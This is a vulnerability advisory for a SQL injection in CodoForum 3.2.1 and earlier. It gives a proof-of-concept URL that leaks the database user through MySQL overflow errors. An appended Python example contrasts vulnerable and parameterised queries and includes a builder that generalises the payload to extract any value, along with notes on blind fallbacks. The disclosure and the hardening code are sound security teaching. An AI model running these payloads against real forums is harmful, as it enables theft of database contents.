CodoForum 3.2.1 SQL Injection

2016.07.26
Credit: Yakir Wizman
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

1. Advisory Information
========================================
Title : CodoForum <= 3.2.1 Remote SQL Injection Vulnerability
Vendor Homepage : https://codoforum.com/
Remotely Exploitable : Yes
Versions Affected : 3.2.1 and earlier
Tested on : Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5
Vulnerability : SQL Injection (Critical/High)
Date : 23.07.2016
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)

2. CREDIT
========================================
This vulnerability was identified during a penetration test by Yakir Wizman.

3. Description
========================================
The script that parses the request URL and displays a user profile for the id it extracts does not validate that id before using it in a SQL query. The id segment of /user/profile/<id> is therefore injectable: anything appended after the numeric id is executed as part of the statement.

4. TECHNICAL DETAILS & POC
========================================
SQL Injection Proof of Concept
----------------------------------------
Example for fetching the current database user (CURRENT_USER()). The injection is error-based: IF() returns the same BIGINT constant on both branches, multiplying it by 2 overflows the signed 64-bit range, and MySQL's "BIGINT value is out of range" error echoes the subquery, with the evaluated CURRENT_USER() value, back in the response:
http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610)))

5. SOLUTION
========================================
Upgrade to the latest version, v3.4 build 19.
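The following is an added example, not CodoForum's code or the advisory author's: it models the flaw described in sections 3 and 4 (a profile id spliced into a query as text) next to a hardened lookup that validates and binds the id, and it generalises the section 4 payload into a builder that wraps any scalar expression in the same BIGINT-overflow construction. The users table, its columns and the sample rows are constructed for the demonstration; sqlite3 stands in for MySQL only to show the root cause, so the overflow error itself is not reproduced here.

```python
import re
import sqlite3
from urllib.parse import quote


def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the forum's user table.
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin@example.org"), (2, "alice", "alice@example.org")],
    )
    return con


def profile_vulnerable(con: sqlite3.Connection, raw_id: str) -> list:
    # Mirrors the advisory's flaw: the id segment of /user/profile/<id> is
    # dropped straight into the statement, so "1 AND (SELECT ...)" or
    # "1 OR 1=1" becomes SQL instead of data.
    sql = "SELECT id, username, email FROM users WHERE id = " + raw_id
    return con.execute(sql).fetchall()


def profile_safe(con: sqlite3.Connection, raw_id: str) -> list:
    # Hardened form: accept only a plain decimal integer, then bind it as a
    # parameter so the driver never interpolates it into the query text.
    if not re.fullmatch(r"[0-9]{1,18}", raw_id):
        raise ValueError("invalid profile id")
    return con.execute(
        "SELECT id, username, email FROM users WHERE id = ?", (int(raw_id),)
    ).fetchall()


def build_payload(expr: str, profile_id: int = 1) -> str:
    """Build the advisory's MySQL error-based payload around any scalar
    expression (the advisory uses CURRENT_USER()).

    IF() yields 8446744073709551610 whichever way the condition goes; 2 *
    that exceeds the signed BIGINT maximum (9223372036854775807), so MySQL
    raises "BIGINT value is out of range in '...'" and prints the offending
    expression, subquery result included, in the error text.  IFNULL() keeps
    a NULL result from short-circuiting the trick and MID(...,1,451) keeps
    the leaked string short enough to survive in the error message.
    Returns the URL-encoded path segment for the u= parameter.
    """
    inner = (
        "(SELECT * FROM (SELECT CONCAT((MID((IFNULL(CAST("
        f"{expr} AS CHAR),0x20)),1,451))))s)"
    )
    sqli = (
        f"{profile_id} AND (SELECT 2*(IF({inner}, "
        "8446744073709551610, 8446744073709551610)))"
    )
    # The advisory's URL leaves / ( ) * and , unencoded; only spaces become %20.
    return "/user/profile/" + quote(sqli, safe="/()*,")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id='1 OR 1=1':", profile_vulnerable(db, "1 OR 1=1"))
    print("safe, id='2':", profile_safe(db, "2"))
    try:
        profile_safe(db, "1 OR 1=1")
    except ValueError as exc:
        print("safe, id='1 OR 1=1':", exc)
    print("payload:", build_payload("CURRENT_USER()"))
    print("payload:", build_payload("DATABASE()"))
```

build_payload("CURRENT_USER()") reproduces the advisory's path segment byte for byte; swapping in DATABASE(), VERSION() or a (SELECT ... LIMIT 1) against application tables extracts other values the same way. The technique depends on the MySQL error reaching the HTTP response; when errors are suppressed the same injection point still allows a boolean- or time-based blind approach, just without the single-request extraction.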

